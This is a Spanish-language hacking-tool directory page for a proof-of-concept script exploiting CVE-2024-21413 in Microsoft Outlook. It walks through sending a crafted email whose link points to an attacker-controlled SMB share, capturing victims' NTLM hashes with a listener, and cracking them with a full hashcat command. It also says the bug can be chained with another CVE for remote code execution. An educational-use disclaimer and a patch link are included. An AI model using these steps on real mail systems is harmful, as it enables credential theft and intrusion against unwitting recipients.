Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-21413 — Vulnerabilidad de divulgación de información de Microsoft Outlook (fuga de hash de contraseña) - Expect Script POC | Kitploit
Herramientas/GitHubGitHub/duy-31/cve-2024-21413
Descifrado de ContraseñasHerramientas de PhishingAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónSeguridad de Correo Electrónico
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Vulnerabilidad de divulgación de información de Microsoft Outlook (fuga de hash de contraseña) - Expect Script POC

Ver Repositorio
15733hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-21413 - PoC del Script Expect

Vulnerabilidad de fuga de credenciales y ejecución remota de código en Microsoft Outlook cuando se combina con CVE-2023-21716 (a través del panel de vista previa) CVSS:3.1 9.8 / 8.5

Outlook debería advertirle sobre el riesgo de abrir un enlace externo => pero no es el caso!

image

usage: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

notas: chmod +x cve-2024-21413.sh

requiere la aplicación expect & requiere una IP de envío y un correo electrónico legítimos (para pasar SPF, DKIM, DMARC)


  • Primero ejecute un listener SMB como este

image

  • ejecute el PoC

image

  • y espere el correo electrónico y en la ventana de vista previa haga clic en el enlace

image

  • entonces debería obtener el inicio de sesión y el hash de la persona que hizo clic en el enlace (sin el aviso de advertencia en la versión afectada de Outlook)

    image

  • Luego puede intentar descifrar la contraseña con hashcat. Simplemente copie toda la línea con el nombre de inicio de sesión a un archivo y ejecute hashcat con el módulo 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Puede combinar este CVE con CVE-2023-21716 para obtener RCE !!!

Créditos: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Solución alternativa / Corrección: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Aviso: IMPORTANTE: Este script se proporciona SOLO para fines educativos, pruebas éticas y uso legal. No lo use en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas y redes informáticas es ilegal, y los usuarios que realicen actividades no autorizadas estarán sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.

Descargar herramienta